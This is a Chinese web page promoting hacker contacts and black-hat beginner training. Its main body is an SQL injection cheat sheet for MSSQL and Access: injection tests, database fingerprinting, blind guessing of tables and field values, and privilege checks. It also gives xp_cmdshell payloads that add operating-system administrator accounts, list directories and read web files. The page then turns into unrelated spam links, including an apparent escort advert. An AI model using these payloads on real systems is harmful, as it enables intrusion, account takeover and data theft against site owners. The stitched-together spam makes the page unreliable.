黑客大户的联系方式-黑帽黑客入门(如何成为黑客 基础入门
1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.注入参数是字符
'and [查询条件] and ''='
4.搜索时没过滤参数的
'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库
;and (Select Count(*) from [数据库名])>0
7.猜字段
;and (Select Count(字段名) from 数据库名)>0
8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(Select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(Select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(Select IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
相关文章
皮卡车玻璃多少钱,皮卡挡风玻璃多少钱
前挡玻璃被砸一个枣报价那么大的白花,。 换又几多钱?车不是我的帮别人问!。 玻璃坏了,不影响年检,假如想换,1叶祥尧00多元就可以 你好,普通的后档玻璃价值或许在六七百元阁下 车门的价...
如何安装crx格式文件浏览器扩展插件?
如何安装crx格式文件浏览器扩展插件? 360浏览器:直接拖入即可 谷歌浏览器: (1) 从设置->更多工具->扩展程序 打开扩展程序页面,或者地址栏输入 chrom...
一个普通黑客入侵快手简单吗(快手号被黑客攻击啥意思)
本文导读目录: 1、黑客入侵攻击的一般有哪些基本过程 2、黑客入侵一般有哪些基本过程? 3、快手号被盗了。我的手机会有什么事吗?黑客会通过我的快手号入侵我的手机吗? 4、我真想希望黑客能够...
一起来睡觉(一起来睡觉全集)
猫咪是喜欢在隐蔽和温暖的地方休息的,所以钻被窝几乎成为所有猫咪共同的爱好,其实你不知道,有的狗狗也很喜欢钻被窝,因为猫咪和狗狗都是哺乳动物。 动画?那是CD广播剧来的有要就HI我吧 行宫(唐)元稹寥落...
成都伴游报业-【蒋之瑶】
“成都伴游报业-【蒋之瑶】” 掌握语言:普通话、台语马上可以了解2019年的 上海商务价格表 是多少通过上海地区的经纪人获得商务价格,添加个人联系方式以及,2510,上海商务价格表 2019年预约模特...
黑客帝国邀请萨特(黑客帝国 塞佛)
本文导读目录: 1、跪求《黑客帝国》第一部、第二部、第三部观后感~要求将这三部影片融入到一篇观后感中,字数不少于两千字。 2、存在主义产生于第一次世界大战之后。克尔凯郭尔是现代存在主义哲学的创始人...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!